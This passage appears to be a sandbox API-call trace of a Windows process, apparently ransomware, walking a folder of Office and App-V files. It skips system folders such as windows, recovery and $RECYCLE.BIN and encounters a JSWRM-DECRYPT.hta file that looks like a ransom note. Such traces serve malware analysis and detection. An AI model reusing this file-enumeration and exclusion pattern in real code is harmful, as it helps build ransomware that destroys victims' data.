Flags=0x0, Size=0x20) returned 0x2411c8 [0073.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 19 [0073.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 19 [0073.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.039] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppvIsvSubsystems32.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2=".") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="..") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="...") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="windows") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="recovery") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="perflogs") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="documents and settings") returned -1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.039] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="system volume information") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="msocache") returned -1 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 23 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 23 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0073.040] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppvIsvSubsystems64.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2=".") returned 1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="..") returned 1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="...") returned 1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="windows") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="recovery") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="perflogs") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="documents and settings") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="system volume information") returned -1 [0073.040] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="msocache") returned -1 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0073.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0073.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0073.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.041] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e7acf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x69630, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVLP.exe", cAlternateFileName="")) returned 1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2=".") returned 1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="..") returned 1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="...") returned 1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="windows") returned -1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="recovery") returned -1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="perflogs") returned -1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="documents and settings") returned -1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="$RECYCLE.BIN") returned 1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="system volume information") returned -1 [0073.041] lstrcmpiW (lpString1="AppVLP.exe", lpString2="msocache") returned -1 [0073.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0073.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVLP.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVLP.exe", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVLP.exe", lpUsedDefaultChar=0x0) returned 10 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0073.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVLP.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVLP.exe", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVLP.exe", lpUsedDefaultChar=0x0) returned 10 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0073.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.041] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0073.041] lstrcmpiW (lpString1="C2R32.dll", lpString2=".") returned 1 [0073.041] lstrcmpiW (lpString1="C2R32.dll", lpString2="..") returned 1 [0073.041] lstrcmpiW (lpString1="C2R32.dll", lpString2="...") returned 1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="windows") returned -1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="recovery") returned -1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="perflogs") returned -1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="documents and settings") returned -1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="system volume information") returned -1 [0073.042] lstrcmpiW (lpString1="C2R32.dll", lpString2="msocache") returned -1 [0073.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R32.dll", lpUsedDefaultChar=0x0) returned 9 [0073.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0073.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R32.dll", lpUsedDefaultChar=0x0) returned 9 [0073.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0073.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0073.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0073.042] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2=".") returned 1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="..") returned 1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="...") returned 1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="windows") returned -1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="recovery") returned -1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="perflogs") returned -1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="documents and settings") returned -1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="system volume information") returned -1 [0073.042] lstrcmpiW (lpString1="C2R64.dll", lpString2="msocache") returned -1 [0073.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0073.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0073.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0073.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0073.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0073.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0073.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0073.043] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd11f68b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd11f68b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd191da0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2=".") returned 1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="..") returned 1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="...") returned 1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="windows") returned -1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="recovery") returned -1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="perflogs") returned -1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="documents and settings") returned -1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="system volume information") returned -1 [0073.043] lstrcmpiW (lpString1="concrt140.dll", lpString2="msocache") returned -1 [0073.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0073.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0073.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0073.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0073.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0073.043] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x222fce18, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x222fce18, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x222fce18, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0073.043] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0073.044] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0073.044] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0073.044] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.044] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1242d5d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1242d5d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1bcc41c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5644a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mfc140u.dll", cAlternateFileName="")) returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2=".") returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="..") returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="...") returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="windows") returned 